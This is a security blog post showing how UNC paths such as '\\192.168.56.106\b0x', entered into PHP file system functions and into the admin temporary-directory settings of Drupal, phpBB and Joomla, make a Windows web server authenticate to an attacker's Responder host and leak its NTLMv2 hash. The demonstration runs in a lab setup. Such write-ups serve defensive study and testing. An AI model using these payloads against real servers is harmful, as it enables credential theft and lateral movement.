2020-03-08

Abusing File System functions in web applications - steal NTLMv2 hash

In this blog post, we are going to explore the scenario in which web application allow a user to perform file system related operations on files/directories. An attacker can specify the UNC path as input to vulnerable application and web server will make request to attacker controlled server. During the process of communication, attacker controlled server will trick web server to leak NTLMv2 hash.
   

Pic credit goes to Ashwath Sir

Description:
In programming languages, we have different-different functions which facilitate a user to perform file system related operations.

Programming language has specific function for specific functionality.
Lets consider the case of PHP (Here is full reference to file system functions available in PHP)

File related operations



Directory related operations


File system functions allow a user not just to perform operations on local file/directory but also from remote file system ( For ex. SMB server) as well.
To access remote SMB server, file system function needs UNC path as input and parse it (in Windows based machine).

Environment Set-up: -
My demo environment had following things configured in place to perform the issue exploitation:

    Windows Server 2012 box     (IP - 192.168.56.2)
    Windows 7 AD Client box     (IP - 192.168.56.101)
    Backbox Linux box                (IP - 192.168.56.106)


Windows Server 2012 box: -
This is Active Directory Domain Controller Machine.

Windows 7 AD Client box: -
This machine has Windows 7 OS installed in it and part of Windows Active Directory Domain. Web application is hosted in this machine and web server is running with the privilege of one of the Windows Active Directory Domain user (user box).

Backbox Linux box: -
This is attacker machine in which "Responder" tool is listening on port 445 for File Server Service SMB request.


Exploitation scenario:
So let's suppose, vulnerable web application server is satisfying below mentioned conditions which are required for exploitation:
1.    SMB outbound traffic firewall rule: outgoing traffic must be allowed for Windows machine on which web application is hosted (SMB port 445)
2.    When user supplied data is getting pass to file system function, no other string is getting prepend to it. 

In order to exploit the issue, attacker need to setup "Responder" tool on a remote server.
Windows machine can make SMB request to attacker controlled server and Responder will ask Windows machine to perform Challenge-Response based authentication.
In this process, Responder will steal the NTLMv2 hash from client Windows machine.

Vulnerable code and web server environment:
Web application vulnerable code has interface to perform various operations related file system:



The vulnerable code is hosted in machine which has "Windows 7" OS installed in it and IP of the machine is "192.168.56.101". This machine is part of Windows Active directory Domain "lab.indishell.lab"


Exploiting Directory operation related file system functions:
Lets start with functions which help in performing operation on directory. In vulnerable code, we have multiple functions.
Create Directory - mkdir() PHP function mkdir() expect 2 arguments:
   1. Name of the directory
   2. permission which has to be set on the directory

In my case, Responder is listening on IP 192.168.56.106, which need to be specified in input box like this "\\192.168.56.106\b0x". This input basically specifying that mkdir(), create a directory with name "b0x" on remote file share which has IP 192.168.56.106 (Responder is listening on MSB port 445)



The moment "Create directory" clicked, mkdir() parsed the UNC path and tried to create directory "b0x" on Responder listening machine.
Like always, Responder asked Windows machine to pass the "challenge-response" based authetication and Windows machine passed the NTLMv2 hash to Responder.


Delete directory: rmdir()
PHP rmdir() function expect 1 argument from the user. The argument is the path of the directory which has to be delete.

In input box, specify the UNC path to Responder listening machine like this "\\192.168.56.106\b0x".
The specified path will instruct rmdir() to delete directory with name "b0x" which is present on remote file system having IP 192.168.56.106.


Upon clicking "Delete Directory" button, rmdir() function tried to access the directory "b0x" located on IP 192.168.56.106 (Responder listening machine).
Responder tricked Windows machine to pass NTLMv2 hash.


List directory:
PHP list directory functions also process the UNC path and Responder can steal the NTLMv2 hash from the web application server.



Exploiting File operation related file system functions:
In vulnerable code, we have multiple file operation functions. Lets try them
Delete File - unlink()
 PHP function unlink() delete the file specified and expect 1 arguments which path to the file.

Responder listening on  IP 192.168.56.106,  which need to be specified in input box like this "\\192.168.56.106\b0x.txt". This input basically specifying that unlink(), delete file with name "b0x.txt" on remote file share which has IP 192.168.56.106 (Responder is listening on MSB port 445)


The moment clicked the "Delete File" button, unlink() function tried to access remote file system hosted on IP 192.168.56.106 and Responder will steal the NTLMv2 hash.


Copy File - copy()
PHP function copy() copy the file from specified source to the specified location.




Real life scenario - Drupal (Tested on Version 7.6.6) 
Drupal CMS admin panel has functionality to specify the path to temporary files via  "Temporary Directory" input field.

In Drupal CMS below version 8.2.2, under functional path  "Configuration -> File System", there is option to specify the path to temporary files. User can specify the remote file system path as well using UNC path like this "\\remote_file_system_IP\directory_name":


In this case, I specified the UNC path to my attacker machine on which Respoder is listening on SMB port 445.

 
Drupal CMS tried to access the remote file system and Responder grabbed NTLMv2 hash from the web application user.


Drupal CMS interface error message showing that the script tried to create the directory on remote file system having IP 192.168.1.105 using mkdir() function.


Same behaviour was observed in PHPBB (till version 3.2.3) and Joomla CMS (Latest version)
  
Thanks for reading :)

Special thanks to Sean Metcalf, OJ, hacker fantastic, A K Reddy,Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0nAnurag Srivastava, vivek chauhan


--==[[ With Love from Team IndiShell ]]==--
                             
 --==[[ Greetz To ]]==--
############################################################################################
#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba
#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad
#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA
#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir
#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)



 

Share this post

0 comments

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top